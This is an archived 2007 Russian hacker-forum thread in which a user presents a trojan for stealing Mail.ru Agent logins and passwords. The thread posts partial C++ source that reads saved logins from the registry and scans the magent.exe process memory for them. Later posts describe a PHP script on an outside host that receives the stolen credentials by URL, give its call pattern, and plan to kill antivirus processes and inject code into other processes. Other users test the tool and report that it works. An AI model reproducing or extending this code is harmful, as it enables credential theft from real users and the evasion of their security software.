Форум АНТИЧАТ - Потестите программулю!!!

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - Потестите программулю!!! (https://forum.antichat.xyz/showthread.php?t=31111)

darkf0x

12.01.2007 15:07

Потестите программулю!!!

Хай народ! Я тут новенький (сорри за флуд), но проф. занимаюсь сис. программированием! Увы PHP, Java и подобную хренотень не знаю (да и времени не было изучать), пишу исключительно на Си++ ну и изредко на Delphi....
Ближе к телу! Решил навоять небольшой троянчик для хака magent`a!

Сегодня утром написал сканер дампа сегмента данных MAgenta... Должен выдирать логин и пароль к сей почтовой приблуде! Программуля маленькая, сканит и ищет определенную сигнатуру, при обнаружении сохраняет в файл <C:\magent.pas> все что навыдирала!
Увы может работать достаточно долго, так как механизм не заточен на статический адрес в сегменте данных, а реализованно все в виде перебора памяти процесса magent... Наиболее нормальный механизм, так как адреса не всегда являются статичными и могут меняться от версии MAgenta!
начальные данные для сканинга беруться из реестра, вернее создается сигнатура для поиска, это почтовый адрес и хэш пароля(скорее всего)... Думаю дописать её в виде сервиса который бы после выдирания слал бы всю инфу либо на мыло, или на ICQ , скорее всего оба варианта будут использоваться! Прога у меня работает, на 3 тачилах тестил, и разные количества логинов генерировал.. Нужно потестить правильно ли выдирает пару логин и пароль! Посмотрите плиз! Сразу оговорюсь без всяких подстав и вирей! При тесте можете отрубиться от инета, чтобы не было нехороших мыслей, если все будет удачно, после завершения написания поделюсь!
Собственно сама прога:

[Потёр недоверчивый SladerNon.]

P.S. расширение ExE естесно... Прога сыра, могут быть баги, может провисать проц, так как сканин в цикле...
А вообще жду рецензий!

Ksander

12.01.2007 15:18

не качайте. возможно на 99% что там трой.имхо

Constantine

12.01.2007 15:21

Пахнет очень жестким на**ом

Grey	12.01.2007 15:27

Интересно, а размер в 10 с небольшим килобайт, он писал на делфи или на c++))) и в том и в другом такого размера не добиться.

Программка, которая выводит сообщение на c++ весит килобайт 60, только что проверил.

Mavr	12.01.2007 15:28

Antivirus Version Update Result
AntiVir 7.3.0.21 01.09.2007 no virus found
Authentium 4.93.8 01.12.2007 no virus found
Avast 4.7.892.0 12.30.2006 no virus found
AVG 386 01.11.2007 no virus found
BitDefender 7.2 01.12.2007 no virus found
CAT-QuickHeal 9.00 01.12.2007 no virus found
ClamAV devel-20060426 01.12.2007 no virus found
DrWeb 4.33 01.12.2007 no virus found
eSafe 7.0.14.0 01.10.2007 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.112 01.12.2007 no virus found
eTrust-Vet 30.3.3319 01.11.2007 no virus found
Ewido 4.0 01.11.2007 no virus found
Fortinet 2.82.0.0 01.12.2007 suspicious
F-Prot 3.16f 01.12.2007 no virus found
F-Prot4 4.2.1.29 01.12.2007 no virus found
Ikarus T3.1.0.27 01.09.2007 no virus found
Kaspersky 4.0.2.24 01.12.2007 no virus found
McAfee 4937 01.11.2007 no virus found
Microsoft 1.1904 01.12.2007 no virus found
NOD32v2 1972 01.11.2007 no virus found
Norman 5.80.02 01.12.2007 no virus found
Panda 9.0.0.4 01.12.2007 no virus found
Prevx1 V2 01.12.2007 no virus found
Sophos 4.13.0 01.11.2007 no virus found
Sunbelt 2.2.907.0 01.12.2007 no virus found
TheHacker 6.0.3.147 01.11.2007 no virus found
UNA 1.83 01.11.2007 no virus found
VBA32 3.11.2 01.12.2007 no virus found
VirusBuster 4.3.19:9 01.11.2007 no virus found

darkf0x

12.01.2007 15:32

Цитата:

Сообщение от Grey

Интересно, а размер в 10 с небольшим килобайт, он писал на делфи или на c++))) и в том и в другом такого размера не добиться.

Ню-ню.... Ты родной программингом занимался когда нить? Слышал про написание программ без MFC! Это раз, а во вторых это не троян 100%, Писалось на Си++... И упаковано UPX`ом.. Мля хакеры.. Ламерством пованивает! =( Если уж в программинге не шарите нах что=то гнать?
Я сказал, что это не троян и ни вирь! Ну как вам докажешь?

Ksander

12.01.2007 15:34

Цитата:

Сообщение от darkf0x

Я сказал, что это не троян и ни вирь! Ну как вам докажешь?

Мало ли что ты сказал, ты кто вообще такой ?=)
С сегодняйшей регой к тому же.

Лично я таким методом впариваю трои, по этому и не верю.

Grey	12.01.2007 15:38

Ну ладно, может просто наш новый дружок, захочет поделиться исходничком? а мы уж сами и скомпилируем и запакуем

darkf0x

12.01.2007 15:46

Цитата:

Сообщение от Grey

312-625-207

Ci5	12.01.2007 16:41

Идея рульная. Но верить беспонтово если не видел исходников. Исходники в студию !

darkf0x

12.01.2007 16:43

Цитата:

Сообщение от Ci5

Идея рульная. Но верить песпонтово если не видел исходников. Исходники в студию !

Исходники не дам! Могу дать статическую либу и прототип функции, а там сами проект собирайте!

Constantine

12.01.2007 17:27

Я не верю тебе. ИМХО ты нае**щик, остальное меня не волнует.
Реально таким образом троев впаривают.

darkf0x

12.01.2007 17:34

Цитата:

Сообщение от Constantine

Я не верю тебе. ИМХО ты нае**щик, остальное меня не волнует.
Реально таким образом троев впаривают.

Угу.. А рульному хацкеру слабо дизасмом пройтись и проверить, а перед этим распаковать файлик? =) А? Хацкер? Али демагеры (Soft ICe и т.п.) Мы не знаем?

Constantine

12.01.2007 17:36

Провакация. лол

Ci5	12.01.2007 17:37

При таком раскладе мона firewall поставить на запрещенный режим для всего и проверить прогу. Файл создается на диске c:\ . Если что, то удалить прогу.

NOmeR1

12.01.2007 18:01

2аффтар
А сам протестить не можешь?

darkf0x

12.01.2007 18:10

Цитата:

Сообщение от NOmeR1

2аффтар
А сам протестить не можешь?

Ладно забейте... Че орать сразу!

Kaban

12.01.2007 18:35

верить... не верить... делать мне чтоль нечего... обойдусь и без этой проги.. не велика потеря...

zl0ba

12.01.2007 18:57

Тестю за 5 wmz!

fucker"ok

12.01.2007 20:31

Мда. Мембер, который пишет на С++ программы размером 11kb не стал бы орать "запустите плиз!!! Очень надо!"
(имхо)Да и проще перехватить данные пре пересылке (за основу можно взять снифер nerezus'а.) логин\пароль передаются в открытом виде, без всяких хешей (сам знаю, ковырялся в протоколе)

darkf0x

12.01.2007 20:48

Цитата:

Сообщение от fucker"ok

Вот не надо гнать только! Яж никого не напрягаю.. Повторюсь, прога весит 10 кил, так как запакована UPX кто не знает что это, ваши проблемы. А че говорить! Не суть..

freddi

12.01.2007 22:15

Я буду тестировать, а то тут все испугались.

insurgent

13.01.2007 00:16

Цитата:

Сообщение от freddi

Я буду тестировать, а то тут все испугались.

ну и как? Работает? Или пароли меняешь=)

darkf0x

13.01.2007 00:45

PHP код:


		
			
[QUOTE=_hack_ing_]ну ты суперпуперпрограммистмегахэцкер, ну не такие мы умные, как ты, ну не знаем мы шо ето такое и чем едят=) просто сам головой, или чем это там, подумай?! Я пишу те: я пипец программер, написал програмульку кот ломает фсе мыльники, скачай!!! и еще проверь как она работает, а то я сам не знаю, как она работает 0_о ню давай исходники кому-нить одному и он проверить, ф чем проблема?)[/QUOTE]

Лови мега хацкер...

#include <windows.h>

#include <stdio.h>

#include<tlhelp32.h>

//--------------------------------------------

//--------------------------------------------

//--------------------------------------------

//--------------------------------------------

BOOL ParsingMagentDump(BYTE *, int, int);

//--------------------------------------------

//--------------------------------------------

bool fl_ = 0;

//--------------------------------------------

//--------------------------------------------

void printf_(char *msg)

{

    char tmp[255];

    sprintf(tmp,msg);

    CharToOem(tmp,tmp);

    printf("%s\n",tmp);

}

//--------------------------------------------

//--------------------------------------------

void write_file(BYTE* b, long i)

{



   HANDLE hFile = CreateFile("C:\\magent.pas",

                             GENERIC_READ | GENERIC_WRITE, 

                             0,

                             NULL,

                             OPEN_ALWAYS,

                             FILE_ATTRIBUTE_NORMAL,

                             NULL);



   if(hFile != INVALID_HANDLE_VALUE) 

   {

      DWORD ret;



      if (!fl_)

      {

         fl_ = 1;

         printf_("Файл C:\\magent.pas создан..");

      }



      SetFilePointer(hFile, 0, 0, FILE_END);

      WriteFile(hFile,&b[0],i,&ret,NULL);

      CloseHandle(hFile);

   } else

       printf_("Ошибка создания или открытия файла C:\\magent.pas..");

}

//--------------------------------------------

//--------------------------------------------

void start_scanmmemory()

{

    HKEY key = 0;



    printf_("Берем данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");

    if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Mail.Ru\\Agent\\mra_logins",0,KEY_READ, &key) == ERROR_SUCCESS)

    {

        

         char svValueName[MAX_PATH];

         memset(&svValueName,0,MAX_PATH);

        int count=0;

        DWORD cbValueNameLen = MAX_PATH;

        DWORD cbValueDataLen = MAX_PATH;

        DWORD dwType,pasLen;

        char ttt[255];



        

        while(RegEnumValue(key,count,svValueName,&cbValueNameLen,NULL,&dwType,NULL,&cbValueDataLen)!=ERROR_NO_MORE_ITEMS) 

        {



            if (strlen(svValueName) > 0) 

            {

                sprintf(ttt,"Логин : %s",svValueName);

                printf_(ttt);



                BYTE g[255];

                BYTE login[255];

                memset(&g,0,255);

                memset(&login,0,255);

                RegQueryValueEx(key,svValueName,NULL,&dwType,g,&pasLen);



                int i = strlen(svValueName);

                memcpy(login,&svValueName[0],strlen(svValueName));

                memcpy(&login[i],g,4);



                



                sprintf(ttt,"Размер пароля : %d",pasLen-4);

                printf_(ttt);

                

                i+=4;



                

                ParsingMagentDump(login, i, pasLen);



            }

            memset(&svValueName,0,MAX_PATH);

            cbValueNameLen = MAX_PATH;

              cbValueDataLen = MAX_PATH;

            count++;

        }

        

        if (count == 0)

            printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");

        RegCloseKey(key);

    } else

        printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");

        

    

}

//--------------------------------------------

//--------------------------------------------

BOOL ParsingMagentDump(BYTE * login, int ls, int ps)

{



   printf_("Сканим список процессов, ищем magent.exe...");

   HANDLE hProcessSnap;

   PROCESSENTRY32 pe32;

   HANDLE hProcess = 0;

   hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);



   if(hProcessSnap == INVALID_HANDLE_VALUE) return false;

//   .......................

//   Посмотрели и хватит!!!!



          }

          

          offset++;







          if (offset > (0x800000) || fl) break;

      }



   } else

       printf_("Не удалось найти процесс Magent.exe в списке процессов...");



   CloseHandle(hProcessSnap);



   

   return fl;

}

//--------------------------------------------

//--------------------------------------------

int main(int argc, char* argv[])

{

    start_scanmmemory();

    printf_("Работа закончена!");

    return 0;

}

asm33

13.01.2007 03:14

ну ппц. Взяди бы и на виртуальной тачке бы запустили эту хрень, если боитесь))))

Ci5	13.01.2007 15:00

Цитата:

Сообщение от _hack_ing_

ну ты суперпуперпрограммистмега хэцкер, ну не такие мы умные, как ты, ну не знаем мы шо ето такое и чем едят=) просто сам головой, или чем это там, подумай?! Я пишу те: я пипец программер, написал програмульку кот ломает фсе мыльники, скачай!!! и еще проверь как она работает, а то я сам не знаю, как она работает 0_о ню давай исходники кому-нить одному и он проверить, ф чем проблема?)

Если ты не шаришь в программировании, то лучше помолчи и не делай свои выводы "правильные", КУЛЦ МЕГА ХАЦКЕР И ПРОГРАММЕР. И как те сказали - харошь флудить.

2 darkf0x - ты решил траблу с записью всего процесса в файл ? И вообще, когда тя мона в ICQ найти ?

darkf0x

13.01.2007 15:52

Цитата:

Сообщение от Ci5

ПЕСДОС, если ты не шаришь в программировании, то лучше помолчи и не делай свои выводы "правильные", КУЛЦ МЕГА ХАЦКЕР И ПРОГРАММЕР. И как те сказали - харошь флудить.

2 darkf0x - ты решил траблу с записью всего процесса в файл ? И вообще, когда тя мона в ICQ найти ?

В будние дни постоянно.. В выходные изредка! =( Проблемы решил! Оказалось все тривиально! Хотя мне не нравится скорость перебора памяти.. Сейчас прикидываю как сразу вычислить относительный адрес сегмента, без тупого брута! =( Мыслишки есть! А так если есть желание пишите на dark_f0x@mail.ru или anclave2007@yandex.ru
Есть интересные мысли! Кстати эту "уязвимость" можно использовать для Фэйков! Народ пользуется почтовыми агентами, если официально всплывет, что он хачится просто, тогда можно фейки делать, типа заплаток от этой уязвимости! =) Ну а там все ограничивается фантазией хакера! Ну да ладно стучите кому интересно! Могу писать что угодно! =) Если грамотно поставите задачу можно написать прикольные трояные!
Программингом даавно занимаюсь и работаю программером... Пишу от сервисов до мультипотоковых приложений, от сокетовых приложений до прог под покеты...
P.S. Многие скептически отнеслись к моим постам, я понимаю, хотя не хотел ни кого пресаннуть!

devil2007

13.01.2007 18:36

lascer private 8.5 орёт что троянский червь

_Great_

13.01.2007 18:42

А мне не нравится пост. Я поставлю -2

freddi

13.01.2007 19:28

darkf0x Маладец!
Все работает, в инет не лезет(те пароли ващи не отправляет никому), пароль от агента нашол, но у меня стояла галочка его сохранить. Довольно быстро, гдето за 1 минуту.

Так что уберите минус у него!!!!

darkf0x

13.01.2007 19:45

Цитата:

Сообщение от freddi

А ладно... Забейте ребята... Каму интересна идея, допишу прогу тому дам заюзать... И Исходники..
По поводу троянских червей: По всей видимостри эвристика работает у этого антивиря сильно но глючно... Имхо проги имеющие в коде функции перебора и открытия левых процессов, а также чтение из них данных считать за трояны... Как-то... Хер знает.. логика понятна, но не всегда правильна!

freddi

13.01.2007 19:48

У меня касперский не запалил ничего, и аутпост тоже.

darkf0x

13.01.2007 19:59

Цитата:

Сообщение от freddi

У меня касперский не запалил ничего, и аутпост тоже.

на самом деле довольно долго память сканин и проц провешивает... Сейчас решу эту проблему и отвяжу от галки сохранять пароль (вернее от данных из реестра)!
Думаю брутить по другому алгоритму! А то народ не всегда галку ставит...

darkf0x

13.01.2007 21:22

Сейчас готов скрипт работающий на левом хосте и отправляющий через урл логин и пароль на нужный ящик.. =) Так что скора будет релиз проги и скрипта обслуживающего прогу!

Ci5	14.01.2007 10:38

Логин и пароль у меня нашел исправно. Кароч, идея хорошая, хоть и узко применимая, но все равно +.

darkf0x

14.01.2007 11:26

Цитата:

Сообщение от Ci5

Логин и пароль у меня нашел исправно. Кароч, идея хорошая, хоть и узко применимая, но все равно +.

Согласен... Узкая, но для меня начинающего, надеюсь будет отправной точкой в мир хакерства! =)

Так на сегодняшний день уже:
1. Прога не привязана к реестру (не обязательно ставить галку сохранить пароль)
2. Поиск и парсинг происходит на-а-амного быстрее: (вычисление адреса PE заголовка в памяти + смещение к сегменту данных (размер проги)) Вычисление абсолютного адреса не получилось, имхо файл у них запакован UPX, соответственно PE не совсем тот что нужен мне.. =( Ну и хер с ним.. =) Мы тоже не лыком шиты!
Приблизительный адрес все равно вычисляем! Единственное чтобы вычислить адрес PE хидера, пришлось создавать поток в процессе жертве... Нормальные Антивири на такое могут заорать! =( Но без такого выкрутаса не получить правильного адреса PE хидера MAgenta...
3. Написал скрипт на php, лежит на
darkanclave.hut2.ru - примитив, но исправно должен отправлять пару параметров на указанную почту!
Вызывает так:
darkanclave.hut2.ru/getaccount.php?l=<param1>&p=<param2>&mail=<Ваш� � почта>
сейчас затачиваю прогу под него! Чтобы скрыто отправляла все что выдрала через этот URL...

Кому интересно новая(скоростная) тестовая версия (без отправки и с выводом лога) лежит: anclave2007.narod.ru/mh.ex

Rayne

21.01.2007 17:11

Заранее извеняюсь, если что-то не увидел, или просмотрел, но к проге есть мануал, как ею узать?
Заранее спасибо.
ПС автору спасибо за прогу

Ci5	21.01.2007 17:26

Прога еще в разработке. Жди пока он ее закончит.

wano81

21.01.2007 18:37

Цитата:

Сообщение от Rayne

там не нужен мануал просто отправляешь фаил и потом ловишь пасс
но чесно сказать неизвестно выложиться прога в паблик или нет потому как обидели человека очень сильно!

darkf0x

24.01.2007 12:14

Цитата:

Сообщение от wano81

Ну... Уж не так сильно, так немножко подобосрали.. =)
Короче народ! Программа почти написана, находится в стадии тестирования и разработки механизма интеграции вредоносного кода в левые процессы... Если не сложно!
Киньте названия процессов всех антивирей и файеров что вам встречались или которые вы юзаете!
Например:
outpost.exe
и т.п.
Это нужно для троя, он будет гасить это дерьмо в памяти
перед своей интеграцией в чужой процесс имхо эти пакостные помошники жизни юзверей перехватывают API вызовы, и блокируют интеграцию.. Чтобы этого не было их нужно замочить... Механизм собственного перехвата API не удобен, имхо после этого трой начинает плохо сосуществовать с антивирями и файерволами! =( Кто юзал к примеру OutpoSt и каспера одновременно на одной тачиле знают, что может быть полная жопа! Поэтому самы простой способ, вырубаем это дерьмо из памяти, интегрируемся, пускай юзер запускает заново... =)

Время: 19:53

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице